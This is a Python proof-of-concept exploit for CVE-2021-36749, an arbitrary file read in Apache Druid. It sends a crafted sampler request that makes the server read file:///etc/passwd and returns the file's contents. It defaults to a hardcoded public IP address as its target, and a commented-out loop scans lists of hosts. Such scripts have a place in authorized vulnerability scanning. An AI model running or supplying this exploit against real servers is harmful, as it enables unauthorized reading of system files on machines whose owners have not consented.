# !/usr/bin/env python3
# -*- coding: utf-8 -*-
import getopt
import sys

import requests

# import others


class Poc(object):


    def verify(self, data):
        url = data['url'].strip('/') + '/druid/indexer/v1/sampler?for=connect'
        headers = data['headers']
        json_data = {"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "http", "uris":
                                                                                 ["file:///etc/passwd"]}},
                                               "dataSchema": {"dataSource": "sample", "parser": {"type": "string",
                                                                                                 "parseSpec": {
                                                                                                     "format": "regex",
                                                                                                     "pattern": "(.*)",
                                                                                                     "columns": ["a"],
                                                                                                     "dimensionsSpec": {},
                                                                                                     "timestampSpec": {
                                                                                                         "column": "!!!_no_such_column_!!!",
                                                                                                         "missingValue": "2010-01-01T00:00:00Z"}}}}},
                     "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
        try:
            response = requests.post(url, headers=headers, json=json_data, timeout=10, verify=False,
                                     allow_redirects=False)
            response_text = response.text
            if 'root:x:0' in response_text:
                return {
                    'title': '{} 存在Apache Druid任意文件读取漏洞(CVE-2021-36749)'.format(url),
                    'desc': '{} 存在Apache Druid任意文件读取漏洞, 返回内容为: {}'.format(url, response_text)

                }
        except Exception:
            pass


if __name__ == "__main__":
    # p = Poc()
    # hosts = others.get_hosts_by_file('/Users/m3lon/Tools/9.Scanner/vulnscan/data/druid/CVE-2021-36749/hosts.txt')
    # for host in hosts:
    #     print('[*]{}'.format(host))
    #     r = p.verify({
    #         'url':  host,
    #         'headers': {}
    #     })
    #     if r:
    #         print(r)
    #         exit()

    argv = sys.argv[1:]
    url = 'http://82.156.185.147:8081'
    try:
        opts, args = getopt.getopt(argv, "u:")  # 短选项模式

    except:
        print("Error")

    for opt, arg in opts:
        if opt in ['-n']:
            name = arg
        elif opt in ['-u']:
            url = arg


    p = Poc()
    r = p.verify({
        'url': url,
        'headers': {}
    })
    print(r)